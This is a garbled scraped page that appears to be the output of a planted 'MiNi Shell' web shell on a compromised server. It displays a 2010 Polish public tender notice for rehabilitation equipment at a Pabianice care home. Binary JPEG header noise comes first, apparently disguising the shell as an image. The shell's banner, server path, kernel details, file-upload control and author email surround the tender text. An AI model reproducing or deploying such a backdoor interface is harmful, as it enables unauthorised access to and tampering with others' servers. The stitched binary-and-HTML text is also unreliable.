JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100114/12146-N-2010.html

<p class="kh_header"><b>Pabianice: Naprzeciw potrzebującym - podniesienie jakości usług pomocy społecznej na terenie Powiatu Pabianickiego - etap II - Wyposażenie w sprzęt rehabilitacyjny Domu  Pomocy Społecznej w Pabianicach ul. Wiejska 55-61</b><br>
<b>Numer ogłoszenia: 12146 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 042 2137551, faks 042 2137640.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprzeciw potrzebującym - podniesienie jakości usług pomocy społecznej na terenie Powiatu Pabianickiego - etap II - Wyposażenie w sprzęt rehabilitacyjny Domu  Pomocy Społecznej w Pabianicach ul. Wiejska 55-61.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:realizacja projektu -Naprzeciw potrzebującym - podniesienie jakości usług pomocy społecznej na terenie Powiatu Pabianickiego - etap II- współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013 na podstawie umowy o dofinansowanie projektu nr UDA - RPLD. 05-02-00-00-009.09-00
Realizacja projektu będzie polegała na wyposażeniu w sprzęt rehabilitacyjny Domu  Pomocy Społecznej w Pabianicach ul. Wiejska 55-61 jego instalację w miejscu wskazanym przez Zamawiającego, uporządkowanie pomieszczeń po wykonaniu prac instalacyjnych, przeszkolenie pracowników Zamawiającego w zakresie obsługi i konserwacji oraz przekazanie Zamawiającemu urządzeń do eksploatacji. Przedmiot zamówienia został szczegółowoopisany  w załącznik nr 1 specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6, 33.15.50.00-1, 33.15.40.00-4, 33.15.81.00-3, 33.15.84.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1)Oferta musi być zabezpieczona wadium w wysokości  5 000,00 Wykonawca jest zobowiązany wnieść wadium w nieprzekraczalnym terminie do dnia 22.01.2010r. do godziny 9:00.
2) Wadium może być wniesione w jednej lub kilku następujących formach:
   - pieniądzu,
   - poręczeniach bankowych lub poręczeniach spółdzielczej kasy
     oszczędnościowo-kredytowej, gwarancjach tym że poręczenie kasy jest
     zawsze poręczeniem pieniężnym,
   - gwarancjach bankowych,
   - gwarancjach ubezpieczeniowych,
   - poręczeniach udzielanych przez podmioty, o których jest mowa w art. 6 ust.
     5 pkt 2 lit. b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji
     Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z poźn. zm.).
3) Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na
     rachunek zamawiającego w banku: 
     PKO BP Pabianice 10 1020 3437 0000 1102 0018 1990   z adnotacją -Wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) Spełniają warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień
    Publicznych,
2) Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ww. ustawy.
3) Oświadczą , że w ciągu ostatnich 3 lat od daty wszczęcia postępowania zrealizowali  co najmniej 3 dostawy na kwotę nie mniejszą niż 200 000,00 zł brutto każda w zakresie  dostaw  wyposażenia  dla instytucji podlegających prawu zamówień publicznych. Potwierdzeniem tego warunku będzie wypełnienie i podpisanie Załącznika nr 6 do SIWZ.
4) Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Ocena spełniania ww. warunków dokonana zostanie w oparciu o informacje
zawarte w dokumentach i oświadczeniach, metodą spełnia-nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wykonawca spełnia ww. warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające warunki udziału w postępowaniu:

1) Oświadczenie o treści zgodnej z art. 22 ust. 1 ustawy Prawo Zamówień
    Publicznych - podpisany załącznik nr 5 do siwz.
2) Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na
    podstawie art. 24 ust 1 i 2 ustawy - podpisany załącznik nr 5 do siwz.
3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
    do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają
    wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,
    wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
    ofert, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to
    każdego z nich.
4) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz
    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
    Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie
    zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
    zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności,
    lub wstrzymanie w całości wykonania decyzji właściwego organu -
    wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania
    ofert, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to
    każdego z nich.
5) Potwierdzona za zgodność kopia polisy lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
6) Oświadczenie , że w ciągu ostatnich 3 lat od daty wszczęcia postępowania zrealizowali co najmniej 3 dostawy na kwotę nie mniejszą niż 200 000,00 zł brutto każda w zakresie dostaw  wyposażenia  dla instytucji podlegających prawu zamówień publicznych.   Potwierdzeniem tego warunku będzie wypełnienie i podpisanie Załącznika nr 6 do siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Pabianicach 95-200 Pabianice ul. Wiejska 55/61
sekretariat..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2010 godzina 09:00, miejsce: Dom Pomocy Społecznej w Pabianicach 95-200 Pabianice ul. Wiejska 55/61
sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com